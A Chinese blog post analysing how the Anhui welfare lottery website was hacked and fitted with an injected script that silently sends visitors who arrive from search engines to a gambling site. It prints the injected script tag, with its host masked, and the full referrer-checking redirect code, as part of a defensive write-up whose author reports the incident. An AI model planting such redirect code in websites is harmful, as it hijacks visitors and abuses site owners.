安徽福彩网被黑客入侵挂上恶意JS脚本的简单分析

今天在某个群中有人发现了安徽福彩网不正常。发现者:通过baidu或google,搜索“安徽福彩”

并且通过搜索结果链接点进去
发现网页从安徽福彩地址www.ahfc.gov.cn
自动跳转到一赌博网站地址:

1.jpg - 大小: 55.45 KB - 尺寸: 372 x 521 - 点击打开新窗口浏览全图

1-11.jpg - 大小: 32.32 KB - 尺寸: 389 x 232 - 点击打开新窗口浏览全图

凭着个人多年的经验,很明显这个一个小菜鸟黑客,加个简单的针对搜索判断的JS脚本而已

查看下源代码,果然在1420行:发现恶意js代码:

(为了防止恶意网址对本博客影响,所以一律屏蔽了地址,可以看截图)

2.jpg - 大小: 39.62 KB - 尺寸: 727 x 181 - 点击打开新窗口浏览全图

<script language=javascript src="http://www.xxxxx.com/1788.js"></script>

里面的JS代码,很简单:

意思就是,针对'google.','baidu.','soso.','yahoo.','youdao.','sogou.','gougou.是搜索引擎来源,自动跳转到非法赌博网站上,这也就印证了发现者的问题,从搜索引擎访问就会跳转到非法赌博网站,如果直接访问是没有问题的。


if(window.name != 'ad_app6'){
	var r = document.referrer;
	r = r.toLowerCase();
	var aSites = new Array('google.','baidu.','soso.','yahoo.','youdao.','sogou.','gougou.');
	var b = false;
	for (i in aSites){
		if (r.indexOf(aSites[i]) > 0){
			b = true;
			break;
		}
	}
	
	if(b)
	{
		self.location = '赌博网站';
		window.adworkergo = 'ad_app6';
	}
}
3.jpg - 大小: 48.65 KB - 尺寸: 782 x 459 - 点击打开新窗口浏览全图


博文写完了,我已经通知安徽福彩的制作单位中安在线了,唉~~~~

后记:

其实,我看到的时候也已经很晚了,这个只是针对了从搜索引擎访问的网友,而且安徽福彩发行中心搜索的人也应该非常大吧,从被入侵挂上恶意代码到被清楚,这期间时间也不短,我相信对安徽福彩发行中心的影响也非常不好。

希望有关部门和人员把网络安全重视起来,防止被不法分子利用了。

关键词: 黑客入侵 , 安徽福彩网

上一篇: Win7/Windows2003下IIS6.0、IIS7.5的伪静态组件ISAPI_Rewrite安装和伪静态配置方法
下一篇: 基于ubuntu 12.04的Linux服务器安全配置

目前还没有人评论,您发表点看法?
发表评论

评论内容 (必填):